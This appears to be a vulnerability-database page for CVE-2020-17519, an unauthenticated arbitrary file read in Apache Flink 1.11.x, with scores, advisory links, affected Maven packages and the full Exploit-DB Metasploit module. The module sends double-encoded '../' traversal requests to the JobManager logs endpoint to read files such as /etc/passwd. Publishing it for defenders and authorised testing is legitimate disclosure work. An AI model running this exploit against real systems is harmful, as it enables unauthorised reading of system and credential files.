CVE-2020-17519

unknown KEV

Published 2021-01-06 · Modified 2024-05-23

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:H

CVSS v4 NEW

—

not yet in upstream

VIR risk

2.5

Description

Apache Flink contains an improper access control vulnerability that allows an attacker to read any file on the local filesystem of the JobManager through its REST interface.

CISA KEV

Vendor: Apache
Product: Flink
Due date: 2024-06-13

Predictions

Exploit likelihood

99%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

vendor Authored 2026-05-27

{Vendor advisory: cisa-kev — This vulnerability affects a common open-source component, third-party library, or a protocol used by different products. Please check with specific vendors for information on patching status. For more information, please see: https://lists.apache.org/thread/typ0h03zyfrzjqlnb7plh64df1g2383d; https://nvd.nist.gov/vuln/detail/CVE-2020-17519}

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-49398 webapps java verified ruby · 3 KB

SunCSR Team · 2021-01-08

Apache Flink 1.11.0 - Unauthenticated Arbitrary File Read (Metasploit)

ruby exploit Source: Exploit-DB

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
    include Msf::Exploit::Remote::HttpClient
    include Msf::Auxiliary::Scanner
    include Msf::Auxiliary::Report

      def initialize(info = {})
          super(update_info(
            info,
            'Name'           => 'Apache Flink File Read Vulnerability',
            'Description'    => %q{
                This module exploits an unauthenticated directory traversal vulnerability
                in Apache Flink version 1.11.0 (and released in 1.11.1 and 1.11.2 as well),
                allowing arbitrary file read with the web server privileges
            },
            'Author'         =>
              [
                '0rich1 - Ant Security FG Lab', # Vulnerability discovery
                'Hoa Nguyen - Suncsr Team',    # Metasploit module
              ],
            'License'        => MSF_LICENSE,
            'References'     =>
              [
                ['CVE', '2020-17519'],
                ['URL', 'http://www.openwall.com/lists/oss-security/2021/01/05/2'],
                ['URL', 'https://www.tenable.com/cve/CVE-2020-17519']
              ],
            'Privileged'     => false,
            'Platform'       => ['php'],
            'Arch'           => ARCH_PHP,
            'Targets'        => [['', {}]],
            'DefaultTarget'  => 0,
            'DisclosureDate' => 'Jan 05 2021'

            ))

            register_options([
                OptInt.new('DEPTH',[true,'Traversal Depth',12]),
                OptString.new('FILEPATH',[true,'The path file to read','/etc/passwd'])
            ])
            end

            def run_host(ip)
                traversal = '..%252f' * datastore['DEPTH']
                filename = datastore['FILEPATH'].gsub("/","%252f")
                filename = filename[1, filename.length] if filename =~ /^\//

                res = send_request_cgi({
                    'method' => 'GET',
                    'uri' => normalize_uri(target_uri.path,'jobmanager','logs',"#{traversal}#{filename}"),
                })

                fail_with Failure::Unreachable, 'Connection failed' unless res fail_with Failure::NotVulnerable, 'Connection failed. Nothingn was downloaded' if res.code != 200
                fail_with Failure::NotVulnerable, 'Nothing was downloaded. Change the DEPTH parameter' if res.body.length.zero?

                print_status('Downloading file...')
                print_line("\n#{res.body}\n")
                  fname = datastore['FILEPATH']
                  path = store_loot(
                  'apache.traversal',
                  'text/plain',
                  ip,
                  res.body,
                  fname
                )
                print_good("File saved in: #{path}")
            end
        end

Metasploit modules

auxiliary_scanner/http/apache_flink_jobmanager_traversal rank 300

Apache Flink JobManager Traversal

Source fetch failed: fetch_error — view the original via the link above.

Package impact

Ecosystem	Package	Vulnerable	Fixed
Maven	org.apache.flink:flink-runtime_2.11	`>=1.11.0,<1.11.3`	`1.11.3`
Maven	org.apache.flink:flink-runtime_2.12	`>=1.11.0,<1.11.3`	`1.11.3`

References

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.